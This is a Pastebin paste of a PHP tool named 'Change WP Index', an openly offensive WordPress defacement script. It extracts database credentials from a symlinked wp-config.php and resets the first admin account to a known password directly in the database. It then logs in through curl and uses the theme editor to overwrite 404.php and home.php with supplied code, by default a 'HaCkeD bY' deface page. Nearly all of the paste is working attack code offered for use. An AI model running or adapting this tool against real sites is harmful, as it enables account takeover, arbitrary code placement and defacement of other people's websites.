API tools faq
paste
Guest User

Untitled

a guest
Feb 13th, 2019
206
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.26 KB | None | 0 0
raw download clone embed print report
  1. <?
  2.  
  3. ###########################################
  4. # Change WP Index #
  5. # Coded By xr00tx #
  6. # crash.burn@hackermail.com #
  7. # #
  8. ###########################################
  9. if($_POST['form_action'] == 1 )
  10. {
  11.  
  12. $text=file_get_contents($_POST['file']);
  13.  
  14.  
  15. $username=entre2v2($text,"define('DB_USER', '","');");
  16. $password=entre2v2($text,"define('DB_PASSWORD', '","');");
  17. $dbname=entre2v2($text,"define('DB_NAME', '","');");
  18. $prefix=entre2v2($text,"$table_prefix = '","'");
  19. }
  20.  
  21. if($_POST['form_action'] == 2 )
  22. {
  23. $prefix=($_POST['db_prefix']);
  24. $username=($_POST['db_username']);
  25. $password=($_POST['db_password']);
  26. $dbname=($_POST['db_name']);
  27.  
  28.  
  29.  
  30.  
  31. }
  32. /*
  33. echo($username);
  34. echo("<br>");
  35. echo($password);
  36. echo("<br>");
  37. echo($dbname);
  38. echo("<br>");
  39. echo($prefix);
  40. echo("<br>");
  41. */
  42.  
  43. if ($_POST['form_action'])
  44. {
  45. $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";
  46. $link=mysql_connect("localhost",$username,$password) ;
  47. if ($link) {
  48. mysql_select_db($dbname,$link) ;
  49. $req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'raka',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `wp_users`.`ID` =1 LIMIT 1 ;");
  50. echo("<br>[+] Changing raka password to 123456789");
  51. $req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
  52. $data = mysql_fetch_array($req);
  53. $site_url=$data["option_value"];
  54.  
  55. echo("<br>");
  56. echo($data["option_value"]);echo("/wp-login.php");
  57. }
  58. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  59.  
  60.  
  61.  
  62. $url2=$site_url."/wp-login.php";
  63.  
  64. $ch = curl_init();
  65. curl_setopt($ch, CURLOPT_URL, $url2);
  66. curl_setopt($ch, CURLOPT_POST, 1);
  67. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=raka&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
  68.  
  69. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  70. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  71. curl_setopt($ch, CURLOPT_HEADER, 0);
  72. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  73. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  74. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  75.  
  76.  
  77. $buffer = curl_exec($ch);
  78.  
  79. $pos = strpos($buffer,"admin");
  80.  
  81. if($pos === false) {
  82. echo("<br>[-] Login Error");
  83. exit;
  84. }
  85. else {
  86. echo("<br>[+] Login Successful");
  87. }
  88.  
  89. echo("<br>[*] Theme editor ...");
  90. $url2=$site_url."/wp-admin/theme-editor.php";
  91.  
  92. $ch = curl_init();
  93. curl_setopt($ch, CURLOPT_URL, $url2);
  94.  
  95.  
  96. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  97. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  98. curl_setopt($ch, CURLOPT_HEADER, 0);
  99. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  100. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  101. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  102.  
  103.  
  104. $buffer = curl_exec($ch);
  105.  
  106.  
  107. $ar=explode( '<li><a href="theme-editor.php?file=', $buffer);
  108. for($vi=0;$vi < count($ar);$vi++)
  109. {
  110. if(substr_count($ar[$vi],"(404.php)") != 0){
  111. $theme=entre2v2($ar[$vi],'/themes','">');
  112. // echo(entre2v2($ar[$vi],'/themes','">'));
  113. }
  114. }
  115.  
  116. if($theme) {
  117. echo("<br>[+] 404.php file founded in Theme Editor");
  118.  
  119. }
  120. else {
  121. echo("<br>[-] 404.php Not found in Theme Editor");
  122. exit;
  123. }
  124. echo("<br>[*] Updating 404.php .....");
  125.  
  126. //-----------------------------------------------------\\
  127. $theme=str_replace("&","&",$theme);
  128.  
  129. $url2=trim($site_url."/wp-admin/theme-editor.php?file=/themes".$theme);
  130.  
  131.  
  132. $ch = curl_init();
  133. curl_setopt($ch, CURLOPT_URL, $url2);
  134.  
  135.  
  136. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  137. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  138. curl_setopt($ch, CURLOPT_HEADER, 0);
  139.  
  140. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  141. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  142. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  143.  
  144.  
  145. $buffer0 = curl_exec($ch);
  146. //echo($buffer0);
  147.  
  148. $_wpnonce=entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  149. $_file=entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  150.  
  151.  
  152. $url2=$site_url."/wp-admin/theme-editor.php";
  153.  
  154. $ch = curl_init();
  155. curl_setopt($ch, CURLOPT_URL, $url2);
  156. curl_setopt($ch, CURLOPT_POST, 1);
  157. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$h."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  158.  
  159. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  160. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  161. curl_setopt($ch, CURLOPT_HEADER, 0);
  162. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  163. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  164. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  165.  
  166.  
  167. $buffer = curl_exec($ch);
  168.  
  169. //echo($buffer);
  170. $pos = strpos($buffer,'<div id="message" class="updated">');
  171.  
  172. if($pos === false) {
  173. echo("<br>[-] Updating 404.php Error");
  174. exit;
  175. }
  176. else {
  177. echo("<br>[+] 404.php Updated Successfuly");
  178. }
  179.  
  180.  
  181. //////////////////////////////
  182.  
  183. $ar=explode( '<li><a href="theme-editor.php?file=', $buffer);
  184. for($vi=0;$vi < count($ar);$vi++)
  185. {
  186. if(substr_count($ar[$vi],"(home.php)") != 0){
  187. $theme=entre2v2($ar[$vi],'/themes','">');
  188. // echo(entre2v2($ar[$vi],'/themes','">'));
  189. }
  190. }
  191.  
  192. if($theme) {
  193. echo("<br>[+] home.php file founded in Theme Editor");
  194.  
  195. }
  196. else {
  197. echo("<br>[-] home.php Not found in Theme Editor");
  198. exit;
  199. }
  200. echo("<br>[*] Updating home.php .....");
  201.  
  202. //-----------------------------------------------------\\
  203. $theme=str_replace("&","&",$theme);
  204.  
  205. $url2=trim($site_url."/wp-admin/theme-editor.php?file=/themes".$theme);
  206.  
  207.  
  208. $ch = curl_init();
  209. curl_setopt($ch, CURLOPT_URL, $url2);
  210.  
  211.  
  212. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  213. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  214. curl_setopt($ch, CURLOPT_HEADER, 0);
  215.  
  216. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  217. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  218. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  219.  
  220.  
  221. $buffer0 = curl_exec($ch);
  222. //echo($buffer0);
  223.  
  224. $_wpnonce=entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  225. $_file=entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
  226.  
  227.  
  228. $url2=$site_url."/wp-admin/theme-editor.php";
  229.  
  230. $ch = curl_init();
  231. curl_setopt($ch, CURLOPT_URL, $url2);
  232. curl_setopt($ch, CURLOPT_POST, 1);
  233. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$h."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  234.  
  235. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  236. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  237. curl_setopt($ch, CURLOPT_HEADER, 0);
  238. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  239. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  240. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  241.  
  242.  
  243. $buffer = curl_exec($ch);
  244.  
  245. //echo($buffer);
  246. $pos = strpos($buffer,'<div id="message" class="updated">');
  247.  
  248. if($pos === false) {
  249. echo("<br>[-] Updating home.php Error");
  250. exit;
  251. }
  252. else {
  253. echo("<br>[+] home.php Updated Successfuly");
  254. }
  255.  
  256. }
  257.  
  258.  
  259. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  260.  
  261. {
  262.  
  263. $ar0=explode($marqueurDebutLien, $text);
  264. $ar1=explode($marqueurFinLien, $ar0[1]);
  265. $ar=trim($ar1[0]);
  266. return $ar;
  267. }
  268.  
  269. ?>
  270. <title>Change WP Index Coded By RAB3OUN</title>
  271. <body bgcolor="#000000">
  272. <style>
  273.  
  274. BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive; color: white;}
  275. textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}
  276. input{FONT-WEIGHT:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: Tahoma; border: 1px solid #666666;height:17}
  277. </style>
  278. <center>
  279. <font color="#FFFF6FF" size='+3'>[ ~~ Change WP Index ~~ ]</font><br><br>
  280. <font color="#0066FF" size='+2'>Symlink to wp-config.php of WP</font><br>
  281. </center>
  282. Symlink to wp-config.php of WP
  283. <br>
  284. <FORM action="" method="post">
  285. <input type="hidden" name="form_action" value="1">
  286. <br>
  287. <input type="text" size="30" name="file" value="">
  288. <br>
  289. <br>
  290. Index Code
  291. <br>
  292. <TEXTAREA rows="18" cols="50" name="code">
  293. </TEXTAREA>
  294. <br>
  295. <INPUT class=submit type="submit" value="Submit" name="Submit">
  296. </FORM>
  297. <hr>
  298.  
  299. <br>
  300. <center>
  301. <font color="#0066FF" size='+2'>DB configuration of WP<font><br>
  302. </center>
  303. <FORM action="" method="post">
  304. <input type="hidden" name="form_action" value="2">
  305. <br>
  306. <table border=1>
  307.  
  308. <tr><td>db_prefix </td><td><input type="text" size="30" name="db_prefix" value="wp_"></td></tr>
  309. <tr><td>db_username </td><td><input type="text" size="30" name="db_username" value=""></td></tr>
  310. <tr><td>db_password</td><td><input type="text" size="30" name="db_password" value=""></td></tr>
  311. <tr><td>db_name</td><td><input type="text" size="30" name="db_name" value=""></td></tr>
  312.  
  313.  
  314. </table>
  315. <br>
  316. <br>
  317. <TEXTAREA rows="18" cols="50" name="code"><html><head></head><body><font color="#000000" face="Copperplate Gothic Light" size="5"><b>HaCkeD bY Mang_Aj0<b></font><br>
  318.  
  319. <FONT face="Agency Fb" size="4" color="#ff0000"><b>: sund4nyMOuz | all indonesian defacer<b></font><br>
  320.  
  321. <font face="Agency Fb" size="3" color="#000000"><b>-= &copy; 2012 by : sund4nyM0uz =-<b></font><br>
  322. <font face="Agency Fb" size="3" color="#ffffff"><b>-= by : sund4nyM0uz =-<b></font><br>
  323. </TEXTAREA>
  324. <br>
  325. <INPUT class=submit type="submit" value="Submit" name="Submit">
  326. </FORM>
  327. <hr>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!